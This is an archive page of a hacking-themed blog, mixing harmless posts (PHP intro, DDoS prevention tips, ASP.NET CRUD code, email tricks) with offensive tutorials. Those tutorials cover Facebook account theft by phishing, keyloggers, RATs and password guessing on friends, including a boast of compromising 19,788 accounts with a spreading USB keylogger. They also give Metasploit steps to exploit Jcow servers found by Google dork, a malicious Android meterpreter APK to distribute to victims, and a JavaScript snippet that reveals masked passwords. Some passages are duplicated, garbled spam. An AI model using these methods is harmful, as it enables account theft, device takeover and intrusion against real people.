Sunday, September 10, 2017

Introduction to PHP

PHP started out as a small open source project that evolved as more and more people found out how useful it was. Rasmus Lerdorf unleashed the first version of PHP way back in 1994.  PHP is a recursive acronym for "PHP: Hypertext Preprocessor".  PHP is a server side scripting language that is embedded in HTML. It is used to manage dynamic content, databases, session tracking, even build entire ecommerce sites.  It is integrated with a number of popular databases, including MySQL, PostgreSQL, Oracle, Sybase, Informix, and Microsoft SQL Server.  PHP is pleasingly zippy in its execution, especially when compiled as an Apache module on the Unix side. The MySQL server, once started, executes even very complex queries with huge result sets in record-setting time.  PHP supports a large number of major protocols such as POP3, IMAP, and LDAP. PHP4 added support for Java and distributed object architectures (COM and CORBA), making n-tier development a possibility for the first time.  PHP is forgiving: PHP language tries to be as forgiving as possible.  PHP Syntax is C-Like.

Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Tuesday, June 3, 2014

3 Basic Tips to Prevent A DDoS Attack

 DDoS Attack
Distributed denial-of-service (DDoS) attacks are always in top headlines worldwide, as they are plaguing websites in banks, and virtually of almost every organization having a prominent online presence. The main cause behind the proliferation of DDoS attacks is that there is a very low-cost that the attacker has to incur to put such attack in motion. Fortunately, today various prevention methods have been developed to tackle such attacks. Before delving further into understanding about the ways to prevent DDoS attack, let’s first understand what exactly a DDoS attack is!
Understanding DDOS Attack

 DDoS Attack bot
A DDoS (distributed denial-of-service) attack is an attempt made by attackers to make computers’ resources inaccessible to its anticipated user. In order to carry out a DDOS attack the attackers never uses their own system; rather they create a network of zombie computers often called as a “Botnet” – that is a hive of computers, to incapacitate a website or a web server.
Let’s understand the basic idea! Now, the attacker notifies all the computers present on the botnet to keep in touch with a particular site or a web server, time and again. This increases traffic on the network that causes in slowing down the speed of a site for the intended users. Unfortunately, at times the traffic can be really high that could even lead to shutting a site completely.
3 Basic Tips to Prevent a DDoS Attack

There are several ways to prevent the DDOS attack; however, here in this guest post I’ll be covering three basic tips that will help you to protect your website from the DDoS attack.

1. Buy More Bandwidth.

 DDoS Attack bandwidth
One of the easiest methods is to ensure that you have sufficient bandwidth on your web. You’ll be able to tackle lots of low-scale DDOS attacks simply by buying more bandwidth so as to service the requests. How does it help? Well, distributed denial of service is a nothing more than a game of capacity. Let’s suppose you have 10,000 computer systems each distributing 1 Mbps directed towards your way. This means you’re getting 10 GB of data that is hitting your web server every second. Now, that’s causes a lot of traffic!
So to avoid such issue, you need to apply the same rule intended for normal redundancy. According to this technique, if you wish to have more web servers just multiply around diverse datacenters and next make use of load balancing. By spreading your traffic to various servers will help you balance the load and will most likely create large space adequate to handle the incessant increase in traffic.
However, there’s a problem with this method that is buying more bandwidth can be a costly affair. And as you’ll know that the current DDoS attacks are getting large, and can be a lot bigger exceeding your budget limit.

2. Opt for DDoS Mitigation Services.

A lot of network or Internet-service providers render DDoS mitigation capabilities. Look for an internet service provider having the largest DDoS protection and mitigation network, automated tools, and a pool of talented anti-DDoS technicians with the wherewithal to take action in real-time as per the varying DDoS attack characteristics. A viable alternative is to utilize a DDoS prevention appliance, which is specifically intended to discover and prevent distributed denial-of-service attacks.

3. Restricted Connectivity.

 DDoS Attack
In case you have computer systems that are connected to the web directly, a better idea is to properly install/configure your routers and firewall so as to limit the connectivity. For an instance, while receiving some data from a client machine you can only allow traffic to pass from the machine only on a few chosen ports (like HTTP, POP, SMTP etc.) via the firewall.
Wrapping Up!


Websites are largely getting attacked by hackers every second. Denial-of-service attack is insanely getting huge and is creating a lot of problems for business organizations having strong online vicinity. In this guest post you’ll not only understand what a DDoS attack actually means, but will also come to know about a few type of methods to prevent DDoS attacks. Aforementioned are three tips that I’ll recommend you to run through to at least understand where to get started towards building a resilient web network with chances of surviving a DDoS attack.


Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

4 ways to Hack Facebook account password

Hi friends, I have already posted two posts on How to hack Facebook account password, first using the Keyloggers and other is using Phishing. Today I am going to reveal all the methods that can be used to hack a Facebook account password.
Today I will cover all 4 ways to Hack Facebook Account Password that all hackers usually use to hack your Facebook account.
1. Facebook Phishing Attack
2. Hacking Facebook account password remotely using Keyloggers and RAT's
3. By hacking the primary email address that user has used for creating Facebook account.
4. Social Engineering or simply Guessing your friends Password.

 facebook logo

 

Facebook Phishing Attack:

I am explaining this method first because its the most easiest and also the most popular method for hacking Facebook password. You can also search on Google the various famous Facebook hacking methods and you will find Phishing technique on the top always. And I am explaining the methods according to their popularity.

Now you want to know which is my favorite method for Hacking Facebook account passwords and i will undoubtedly tell its simply PHISHING.

I will recommend my users to read this post for knowing how to hack Facebook using Phishing as i have explained it in detail here:

If you want latest Facebook phisher then subscribe my Hacking tricks and mail me privately or post your email below in comments. I will provide you within a day, Now why i am not providing it directly, if i provide directly then Facebook will block it again like the previous one. 




Hacking Facebook account password remotely using Keyloggers and RAT's

Aaw... Best method for advanced Hackers. And my second favorite too. Its popularity is little but lower than Phishing only because it involves you to download hack tool and then create your keylogger and send it to victim which is a lengthy process and also unsecured too as you don't aware that the keylogger that you downloading is himself contain some spyware or simply a keylogger attached with it. Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack Facebook password.



I have written a complete article on How to hack Facebook accounts remotely using Keyloggers, so i will recommend you to go through that if you want to learn this technique in detail, so read this article:


Now if you need latest Fully Undetectable Keylogger, then subscribe my hacking tricks and mail me privately or post ur email ID below in comments on which you want to get the download link.





Hacking the Primary Email address 

 If Facebook hacker or any specific Keylogger, by some means, hacks your primary Gmail or yahoo account which you are using as primary email address, then this information account can easily hack your Facebook password using "Forgot password" trick. The Hacker will simply ask Facebook to send password to the primary email address and ask Facebook administrators to send the reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will also be hacked !

So, always remember to protect your primary email address that you have used to create Facebook account and try to keep unknown or useless mail id as your primary email address in Facebook.
     

Social Engineering or Guessing Passwords
This method sounds to be pretty not working at beginning. Even I was neglecting this way for a long time . But, once, I thought of using it against my friend on Facebook and amazingly what happened that i guessed his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For novice hackers, Social engineering is method of retrieving password or Guessing the password or answer of security question simply be hacking some information about the victim or simply gathering his information from his own Facebook and other social networking profiles where most of users provide their critical information just for fashion and doesn't know its consequences. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.
Some Common passwords that you can try on your friends are :

1. Their mobile number or their girlfriend or boyfriend mobile number. (always try his previous or old mobile number as they are not as much as fool that they appears)

2. Their Girlfriend or boyfriend names or their own names concatenating with their Girlfriend or boyfriend names.

3. Date of births

4. Their favorite movie names , cartoon character names or favorite music band names or simply the hero names like batman,dark knight, Superman,Godzilla, Spartacus and much more..

5. Most important now most website ask that password should be alphanumeric now what users do they just adds 1,2,3 in their normal passwords and some more smart guys adds !,@,# in their passwords and amazingly all in Sequence.



Note the above common passwords are not from any internet resource, its by my own case study that i have come to conclusion after hacking 19,788 emails accounts. I know now you want to know how i hacked so much accounts. As i have already mentioned for advanced hackers second option is best and the only thing that i did was just made my Keylogger USB and pendrive spreadable. Who ever used the infected USB drive also got infected and this procedure goes so on. And last what happened  my 10Gb free storage was filled and i don't have enough time to clean it regularly. 



Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

How to Remove a Virus Using Command Prompt


Dear  readers today I am going to tell you  How to Remove a Virus Using Command Prompt
 Virus is a computer program that can copy itself and infect your computer. These viruses can spread via USB/flash drive or from one computer to other computer by few written codes. There are many antivirus software available to remove viruses from computer. But there are some viruses or suspicious files which can’t be removed by any antivirus software. Some suspicious files such as autorun.inf initiate all the viruses in pc. These files must be removed for safe operation of your pc, because they may lead to data loss, software damages etc. Such viruses and files can be removed by using cmd. In this article we will discuss how to remove a virus using command prompt. Following steps can be used to remove a virus using command prompt from your computer.



  • Go to start menu and type “cmd” in the search box or Start>all programs>accessories>command prompt.
  • Open the infected drive such as write , g: to go to G drive.
  • Now type dir/w/a . It will show all the files of the drive including hidden files.
  • Locate AUTORUN.INF or any Virus and other suspicious files in the directory.
there was no virus in my drive so only autorun.inf is been highlighted.
  • Type command attrib  -r –a –s –h to remove attributes of corresponding file.
Type del autorun.inf to delete autorun.inf file.

  • Now type del virus name.exe t delete it, eg : del newfolder.exe .
(You can also delete viruses by using following steps:
  • When you find an Autorun.inf file or any other unusual .exe file just rename it.



Syntax for rename is (rename filename.extension new name ,  for example: (rename autorun.inf virus) to rename autorun.inf file. Here I have renamed it by “virus”.
  • Now you can access the defected drive without affecting the virus.
  • To delete the renamed file go to the defected drive and select the file you renamed.




Now delete the harmful renamed files.)
You have deleted that virus successfully but sometimes virus resides in the Recycler folder.To locate this folder:
  • Type cd recycler command.
  • Again type dir/w/a  to locate all file of the folder.
  • Identify malicious files and delete them using above commands.
Follow the above steps carefully and i think this information is enough to remove a virus using command prompt easily.
Important: Make sure that no other processes being running while performing these actions. Best of luck.

Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Hack Facebook Online 100% Working

Besthacking.in Launchned New Facebook Hacking Website Hack Facebook Account Online and more social networking hacking tricks Check Now Our New Website

Hack Facebook Online>> Click Here

- See more at: http://www.besthacking.in/2014/03/hack-facebook-online.html#sthash.vD8cAbjp.dpuf
Besthacking.in Launchned New Facebook Hacking Website Hack Facebook Account Online and more social networking hacking tricks Check Now Our New Website

Hack Facebook Online>> Click Here

- See more at: http://www.besthacking.in/2014/03/hack-facebook-online.html#sthash.vD8cAbjp.dpuf
Launchned New Facebook Hacking Website Hack Facebook Account Online and more social networking hacking tricks Check Now Our New Website

Hack Facebook Online>> Click Here

Besthacking.in Launchned New Facebook Hacking Website Hack Facebook Account Online and more social networking hacking tricks Check Now Our New Website

Hack Facebook Online>> Click Here

- See more at: http://www.besthacking.in/2014/03/hack-facebook-online.html#sthash.vD8cAbjp.dpuf

Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Thursday, April 24, 2014

Dotnet: asp.net Datalist insert update delete example

I want to show you how to use datalist for CRUD operation in asp.net.



I created one table 'customer' with CustomerID(Primary Key) and CustomerName as two fields in database.



Following is the HTML source

-------------------------------


<h2>Datalist Example Application:</h2>

        <asp:DataList ID="DataList1" runat="server" CellPadding="4"

            onitemcommand="DataList1_ItemCommand"

            oncancelcommand="DataList1_CancelCommand" oneditcommand="DataList1_EditCommand"

            onupdatecommand="DataList1_UpdateCommand"

            ondeletecommand="DataList1_DeleteCommand" ForeColor="#333333">

            <FooterStyle BackColor="#1C5E55" ForeColor="White" Font-Bold="True" />

            <HeaderStyle BackColor="#1C5E55" Font-Bold="True" ForeColor="White" />

            <ItemStyle BackColor="#E3EAEB" />

        <ItemTemplate>

        <table border="0" cellpadding="0" cellspacing="0">

        <tr>

        <th>Customer ID:</th>

        <td><asp:Label ID="lblCustNo" runat="server"
Text='<%#Bind("CustomerID") %>'></asp:Label></td>

        </tr>

        <tr>

        <th>Customer Name:</th>

        <td><asp:Label ID="lblCustName" runat="server"
Text='<%#Bind("CustomerName") %>'></asp:Label></td>

        </tr>

        <tr><td><asp:Image ID="Image1" Height="20px"
Width="20px" ImageUrl="~/Images/edit-icon.png" runat="server" />

        <asp:Button ID="btnEdit" runat="server" Text="Edit"
CommandName="Edit" OnClientClick="return confirm('Are you sure you want
to Edit this record?');" /></td>

        <td>

        <asp:Image ID="Image2" Height="20px" Width="20px" ImageUrl="~/Images/delete.png" runat="server" />

        <asp:Button ID="btnDelete" runat="server" Text="Delete"
CommandName="Delete"  OnClientClick="return confirm('Are you sure you
want to delete this record?');" /></td>

        </tr>

         </table>

        </ItemTemplate>

         <FooterTemplate>

          <table border="0" cellpadding="0" cellspacing="0">

        <tr>

        <th>Customer ID:</th>

        <th>Customer Name:</th>

        </tr>

        <tr>

        <td><asp:TextBox ID="txtCustNo" runat="server"
Text='<%#Bind("CustomerID") %>'></asp:TextBox></td>

        <td><asp:TextBox ID="txtCustName" runat="server"
Text='<%#Bind("CustomerName")
%>'></asp:TextBox></td>

        <td>

        <asp:Image ID="Image1" Height="20px" Width="20px" ImageUrl="~/Images/add.png" runat="server" />

        <asp:Button ID="btnInsert" runat="server" Text="Add New Customer" CommandName="Insert" /></td>

        </tr>

         </table>

         </FooterTemplate>

            <AlternatingItemStyle BackColor="White" />

         <EditItemTemplate>

          <table border="0" cellpadding="0" cellspacing="0">

            <tr>

            <td>Customer ID:</td>

            <td><asp:TextBox ID="etxtCustNo" runat="server"
Text='<%#Bind("CustomerID") %>'></asp:TextBox></td>

            <//tr>

             <tr>

            <td>Customer Name:</td>

            <td><asp:TextBox ID="etxtCustName" runat="server"
Text='<%#Bind("CustomerName")
%>'></asp:TextBox></td>

            <//tr>

            <tr>

            <td><asp:Button ID="btnUpdate" runat="server" Text="Update" CommandName="Update" /></td>

            <td><asp:Button ID="btnCancel" runat="server" Text="Cancel" CommandName="Cancel" /></td>

            </tr>

         </EditItemTemplate>

            <SelectedItemStyle BackColor="#C5BBAF" Font-Bold="True" ForeColor="#333333" />

        </asp:DataList>
---------------------------------

Now on code behind please write following code:




public partial class WebForm1 : System.Web.UI.Page

    {

        protected void Page_Load(object sender, EventArgs e)

        {

            if (!Page.IsPostBack)

            {

                Bind();

            }

        }



        private void Bind()

        {

            string connectionString = ConfigurationManager.ConnectionStrings["mystring"].ConnectionString;

            SqlConnection conn = new SqlConnection(connectionString);

            SqlDataAdapter ad = new SqlDataAdapter("select * from Emp", conn);

            DataSet ds = new DataSet();

            conn.Open();

            ad.Fill(ds);

            conn.Close();

            DataList1.DataSource = ds.Tables[0];

            DataList1.DataBind();



        }



        protected void DataList1_ItemCommand(object source, DataListCommandEventArgs e)

        {

         

            string connectionString = ConfigurationManager.ConnectionStrings["mystring"].ConnectionString;

            if (e.CommandName.Equals("Insert"))

            {

                TextBox txtCustNo = (TextBox)e.Item.FindControl("txtCustNo");

                TextBox txtCustName = (TextBox)e.Item.FindControl("txtCustName");

                SqlConnection conn = new SqlConnection(connectionString);

                SqlCommand cmd = new SqlCommand();

                cmd.Connection = conn;

                cmd.CommandText = "Insert into Emp(CustomerID,CustomerName) values(@1,@2)";

                cmd.Parameters.AddWithValue("@1", txtCustNo.Text);

                cmd.Parameters.AddWithValue("@2", txtCustName.Text);

                conn.Open();

                cmd.ExecuteNonQuery();

                ClientScript.RegisterStartupScript(GetType(), "ShowAlert", "alert('Record Added Succesfully');", true);

                conn.Close();

                Bind();

            }

        }



        protected void DataList1_EditCommand(object source, DataListCommandEventArgs e)

        {



            DataList1.EditItemIndex = e.Item.ItemIndex;

            Bind();

        }



        protected void DataList1_CancelCommand(object source, DataListCommandEventArgs e)

        {

            DataList1.EditItemIndex = -1;

            Bind();

        }



        protected void DataList1_UpdateCommand(object source, DataListCommandEventArgs e)

        {

            string connectionString = ConfigurationManager.ConnectionStrings["mystring"].ConnectionString;

            if (e.CommandName.Equals("Update"))

            {

                TextBox txtCustNo = (TextBox)e.Item.FindControl("etxtCustNo");

                TextBox txtCustName = (TextBox)e.Item.FindControl("etxtCustName");

                SqlConnection conn = new SqlConnection(connectionString);

                SqlCommand cmd = new SqlCommand();

                cmd.Connection = conn;

                cmd.CommandText = "Update Emp set CustomerName=@1 where CustomerID=@2";

                if (txtCustName != null)

                    cmd.Parameters.Add("@1", SqlDbType.VarChar, 50).Value = txtCustName.Text;

                if (txtCustNo != null)

                    cmd.Parameters.Add("@2", SqlDbType.Int, 20).Value = txtCustNo.Text;

                conn.Open();

                cmd.ExecuteNonQuery();

                DataList1.EditItemIndex = -1;

                ClientScript.RegisterStartupScript(GetType(), "ShowAlert", "alert('Record Updated Succesfully');", true);

                conn.Close();

                Bind();

            }

        }



        protected void DataList1_DeleteCommand(object source, DataListCommandEventArgs e)

        {

         

            string connectionString = ConfigurationManager.ConnectionStrings["mystring"].ConnectionString;

            if (e.CommandName.Equals("Delete"))

            {

                Label txtCustNo = (Label)e.Item.FindControl("lblCustNo");

                Label txtCustName = (Label)e.Item.FindControl("lblCustName");

                SqlConnection conn = new SqlConnection(connectionString);

                SqlCommand cmd = new SqlCommand();

                cmd.Connection = conn;

                cmd.CommandText = "Delete from Emp where CustomerID=@1";

                if(txtCustNo!=null)

                cmd.Parameters.Add("@1", SqlDbType.Int, 20).Value = txtCustNo.Text;

                conn.Open();

                cmd.ExecuteNonQuery();

                ClientScript.RegisterStartupScript(GetType(), "ShowAlert", "alert('Record Deleted Succesfully');", true);

                conn.Close();

                Bind();



            }

        }

    }


Run it now by Pressing F5.



Read More

Sunday, April 20, 2014

PS-Drive Android Application


 Click Here to Download PSDrive Android App

Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Thursday, April 17, 2014

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution


Level : Medium
Victim Server : Windows XP SP3
Victim vulnerable application : JCow 4.2
Attacker O.S : Backtrack 5 R1
After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social netwoking engine can be exploited and the exploit ranking marked as "excellent".
So actually what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example if you hosting your Jcow vulnerable version(on unsecure hosting also :-) ) you can own your web server directory.
In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext:Powered by Jcow 4.2.0" and register as normal user there. In this tutorial I have already register as username : victim and password also victim :-)
Okay I hope you understand what I say above :-P to make it more realistic, let's try the tutorial…

Requirement :

1. Metasploit framework
2. Jcow.rb exploit
mediafire.com

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution :

1. Copy the downloaded jcow.rb exploit from the download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(see the command below).
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
the text "framework" with blue color it's because I'm using Backtrack 5 R1 and using metasploit v4.0.1, so the name was depends on your Metasploit version, maybe on your computer it can be "framework3" or "framework2" so on..
If you didn't know how to copy that jcow.rb file into your Backtrack, please refer to this tutorial about Linux folder sharing(click here).
2. Open your Metasploit console and then use the exploit you just added before.
msf > use exploit/remote/jcow
3. The next step we need to view the available switch for this exploit by running show options command, and then configured it(see the box with red color).
4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
msf  exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf  exploit(jcow) > set username victim --> set the username
username => victim
msf  exploit(jcow) > set password victim --> set the password
password => victim
msf  exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here
uri => jcow
Information :
Set uri can be used if jcow was not installed on webserver main directory, for example http://web-server.com/jcow.
4. After everything was set up successfully, the next thing to do was exploiting or running the exploit by using exploit command.
Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Hacking Android Smartphone Tutorial using Metasploit

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast. - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.cAfknmPn.dpuf
 Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.


What is android? according to wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and what is APK? according to wikipedia:
Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
 


Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
Hacking Android Smartphone Tutorial using Metasploit
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
Hacking Android Smartphone Tutorial using Metasploit
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Hacking Android Smartphone Tutorial using Metasploit
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution :-) ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
Hacking Android Smartphone Tutorial using Metasploit
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
Hacking Android Smartphone Tutorial using Metasploit
See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial using Metasploit above:




Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast. - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.cAfknmPn.dpuf
Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast. - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.cAfknmPn.dpuf
Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Saturday, April 12, 2014

Yahoo mail Top Tips, Tricks and Hacks



    If you have been using Yahoo Mail and find yourself looking for some Tips and Tricks then Here is a collection of tips, tricks and Hacks for Yahoo Mail : Check out the latest episode of Upgrade Your Life on Yahoo! and manage your e-mails with latest Easter Eggs.

Yahoo! Tips Tricks and Hacks:


    Trick:Instant Address Book Add - Drag a message onto the Contacts link and you'll see the icon change to a plus sign which means you can add that contact to your address book in one easy step.
    Trick:Navigate your inbox the quick way - Ctrl + Shift + Up Arrow or Down Arrow let you jump to messages in the same folder that have the same subject line. You can hit Ctrl + Shift + Alt + Up Arrow lets you choose another factor to filter on (such as flag) when using Ctrl + Shift to navigate.
    Easter Egg:When composing a message just hit the Subject: button to cycle through a collection of random (often humorous) subject lines. A lot of real gems in here including: * The brain has been polished professor. * All your platypus are belong to us. * I believe those were mouse droppings. * The twins just turned 2 and 4 this month! * How about never? Is never good for you? * Care for a foam apple?
    Hack:Organize Your inbox via Message Finder - Now it is as easy as typing in a search, ordering the results by Contact, Location, or Subject, selecting the messages, and dragging them to a new folder. Sounds complicated? It isn't, just do a search and then start dragging and dropping messages.
    Tip:Select Multiple Messages - Hold shift after selecting a message to select multiple messages. Hold Ctrl to add specific messages to the list. Hit Crtl-A to select all messages in a folder or search results. This is a great way to select everything in your inbox and move it to an archive folder. Set messages to be read as soon as you click on them.
    Tip:Read Messages Now - Go to Options link in the upper right hand corner and then select Mail Options. Find the item labeled mark messages as read and select immediately. This way when you scroll through messages you no longer have to pause one each one to have it marked as read.
    Tip:Hide/Show Viewing Pane - Just hit the letter V on your keyboard to have more space to organize your folder. Hit V again to reopen the message preview.
    Tip:Quick Compose - Type the letter N to start a new message or R to reply to a selected message. Find text within a message
    Trick:Find Text within your message - Hit Crtl + F after selecting a message to find text within a that message. Hitting the enter key lets your scroll through each instance of the word within the message.
    Trick:Scroll through folder without reading - Holding Crtl lets you scroll through a folder messages using the arrow keys without selecting each individual message.
    Tip:Send Message Now - By using the Crtl + Enter Key you can send a message you are composing instantly. No more hunting for the send button.
    That's it! There are quite a few more shortcuts document in the help section but these are the one's I've found most valuable. Leave a comment and share your Yahoo Mail tips.

Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Create Multiple Accounts using same Email ID

GMAIL


Gmail is a free, advertising-supported email service provided by Google. Users may access Gmail as secure webmail, as well as via POP3 or IMAP4 protocols. Gmail initially started as an invitation-only beta release on April 1, 2004 and it became available to the general public on February 7, 2007, though still in beta status at that time. The service was upgraded from beta status on July 7, 2009, along with the rest of the Google Apps suite.

With an initial storage capacity offer of 1 GB per user, Gmail significantly increased the webmail standard for free storage from the 2 to 4 MB its competitors such as Hotmail offered at that time. Individual Gmail messages, including attachments, may be up to 25 MB,. Gmail has a search-oriented interface and a "conversation view" similar to an Internet forum. Gmail is noted by web developers for its pioneering use of Ajax. Gmail runs on Google GFE/2.0 on Linux. As of June 2012, it is the most widely used web-based email provider with over 425 million active users worldwide.


Amazing gmail secret trick

Do you know ?
You can create multiple user accounts (IDs) on websites with a single gmail id. The trick is to use only one Gmail account or gmail id and create many different accounts. 

At-least every website don't allow you to create more then one account associated with same email id. It would be much of a chaotic situation, in case this was possible for every website.

Creating multiple accounts with Gmail is possible for a single website. 

How to create many accounts on a websites with single email id?

Its possible because gmail account does not count dot(.) in email addresses.

Example : xyz@gmail. com and x.yz@gmail.com both are same email address.

This simply means if you send email to x.yz@gmail.com then it will go to xyz@gmail.com. So if you already have your account on a website with xyz@gmail.com you can create an account by registering with x.yz@gmail.com

Similarly, you can imagine how many accounts you would be able to create on same website using a single email id, that too of gmail. 

Note :  90% websites including twitter will allow you to signup with your single gmail id. But Facebook is listed in the other 10% of websites. It won't allow this even if you use dot.

Hope you enjoyed the trick .
Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Facebook Password Hack | Hack IT NOW

Facebook Password Hack | FriendFacebook Password Hack

Many of you guys asked me to post any easy prank to hack facebook password which doesn't require any phishing, key logger or any other difficult method. So here I go with this amazing trick for you all guys to hack any facebook password.

This facebook hack trick will only work when the user has not logged in and is using chrome.

Related : Add all facebook friends to a group in one click

Like us on Facebook for more such updates

Just follow these simple steps mentioned below to know the password of your facebook friend:-

Note : This prank works only when your facebook friends entered their username and password and their password is visible to you only as asterisk while they are using Google Chrome browser .

Step 1 : Open Google Chrome tab where your friends have entered their username and password but password is visible only as asterisk (******) .




Step 2 : Now open console window by just pressing CTRL + SHIFT + J .







Step 3 : Copy the given code by selecting the given code and pressing CTRL + C


Facebook Password Hack | Friend




javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}


Step 4 : Press Enter and you are done . The original password would be displayed as shown in the screen - shot below .

Facebook Password Revealed +Maven Scientists  


Enjoy ! Hope you enjoyed the trick .



Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More
Member
About Us - Privacy Policy - Contact Us
@ Copyright 2013 Powered By Blogger